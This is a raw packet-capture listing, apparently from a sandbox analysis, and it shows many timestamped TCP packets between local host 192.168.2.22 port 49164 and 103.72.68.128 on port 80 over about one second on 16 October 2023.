                                                Oct 16, 2023 09:58:27.368082047 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.368114948 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.368149996 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.368236065 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.368249893 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.368263960 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.368278027 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.368289948 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.368318081 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.368325949 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.368361950 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.368382931 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.368419886 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.368443012 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.368483067 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.368495941 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.368532896 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.368590117 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.368623972 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.368628025 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.368659019 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.368679047 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.368720055 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.368729115 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.368767023 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.368799925 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.368835926 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.368839979 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.368875027 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.368906975 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.368944883 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.368988991 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.369026899 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.369086981 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.369126081 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.369159937 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.369195938 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.369216919 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.369257927 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.369287968 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.369324923 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.369368076 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.369410038 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.369432926 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.369471073 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.369489908 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.369529963 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.369561911 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.369601965 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.369699955 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.369739056 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.369740963 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.369777918 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.369841099 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.369879007 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.369885921 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.369921923 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.369956970 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.369996071 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.370028019 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.370064974 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.370071888 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.370104074 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.370137930 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.370173931 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.370233059 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.370271921 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.370286942 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.370321989 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.370357037 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.370408058 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.370415926 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.370445013 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.370512962 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.370569944 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.370610952 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.370647907 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.370666981 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.370706081 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.370724916 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.370764017 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.370776892 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.370816946 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.370836020 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.370872974 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.370942116 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.370980024 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.370980978 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.371014118 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.371104002 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.371144056 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.371223927 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.371260881 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.371318102 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.371332884 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.371366024 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.371366978 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.371392012 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.371402025 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.371423960 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.371457100 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.371463060 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.371491909 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.371525049 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.371563911 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.371598005 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.371638060 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.371701002 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.371743917 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.371757984 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.371794939 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.372989893 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.373481035 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.713963032 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.713989019 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.714005947 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.714042902 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.714075089 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.714086056 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.714137077 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.714170933 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.714222908 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.714286089 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.714351892 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.714379072 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.714394093 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.714442968 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.714485884 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.714488983 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.714539051 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.714539051 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.714575052 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.714606047 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.714644909 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.714660883 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.714732885 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.714735985 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.714797020 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.714812040 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.714831114 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.714926004 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.714966059 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.714997053 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.715032101 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.715065002 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.715104103 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.715117931 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.715153933 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.715189934 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.715214968 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.715254068 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.715274096 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.715289116 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.715315104 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.715331078 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.715364933 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.715400934 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.715409994 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.715442896 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.715487957 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.715492964 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.715504885 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.715526104 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.715540886 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.715584040 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.715620995 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.715694904 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.715733051 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.715750933 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.715756893 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.715785980 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.715830088 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.715872049 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.715893030 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.715929985 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.715960979 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.716002941 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.716034889 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.716069937 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.716131926 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.716185093 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.716196060 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.716213942 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.716289997 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.716332912 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.716366053 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.716403008 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.716445923 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.716490984 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.716536045 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.716577053 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.716587067 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.716623068 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.716658115 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.716700077 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.716721058 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.716759920 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.716782093 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.716821909 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.716841936 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.716876984 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.716887951 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.716924906 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.716959000 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.716996908 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.717000008 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.717040062 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.717057943 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.717099905 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.717118979 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.717158079 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.717319012 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.717360973 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.717381001 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.717415094 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.717444897 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.717479944 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.717530012 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.717567921 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.717601061 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.717638969 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.717672110 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.717709064 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.717731953 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.717766047 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.717796087 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.717832088 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.717843056 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.717885017 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.717938900 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.717979908 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.718033075 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.718100071 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.718149900 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.718167067 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.718184948 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.718225956 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.718271017 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.718305111 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.718313932 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.718341112 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.718381882 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.718396902 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.718415976 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.718449116 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.718468904 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.718496084 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.718508959 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.718525887 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.718579054 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.718624115 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.718636990 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.718655109 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.718672037 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.718688965 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.718749046 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.718786955 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.718856096 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.718898058 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.718904972 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.718944073 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.718976021 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.719016075 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.719048977 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.719086885 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.719105959 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.719142914 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.719163895 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.719207048 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.719232082 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.719265938 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.719274998 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.719315052 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.719347954 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.719383001 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.719418049 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.719434023 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.719455957 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.719472885 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.719511032 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.719552994 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.719608068 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.719654083 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.719686985 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.719732046 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.719769001 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.719809055 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.719813108 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.719854116 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.719876051 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.719902992 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.719914913 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.719933987 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.719981909 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.720021963 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.720040083 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.720078945 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.720112085 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.720149040 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.720170021 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.720185041 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.720218897 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.720268965 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.720313072 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.720334053 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.720370054 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.720422983 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.720464945 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.720499039 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.720537901 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.720555067 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.720598936 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.720629930 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.720647097 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.720664024 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.720702887 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.720705986 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.720750093 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.720769882 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.720813036 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.720828056 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.720870972 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.720906019 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.720944881 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.720949888 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.720990896 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.721071959 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.721143007 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.721198082 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.721198082 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.721223116 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.721251965 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.721266031 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.721285105 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.721338034 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.721375942 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.721407890 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.721467018 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.721513987 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.721555948 CEST4916480192.168.2.22103.72.68.128
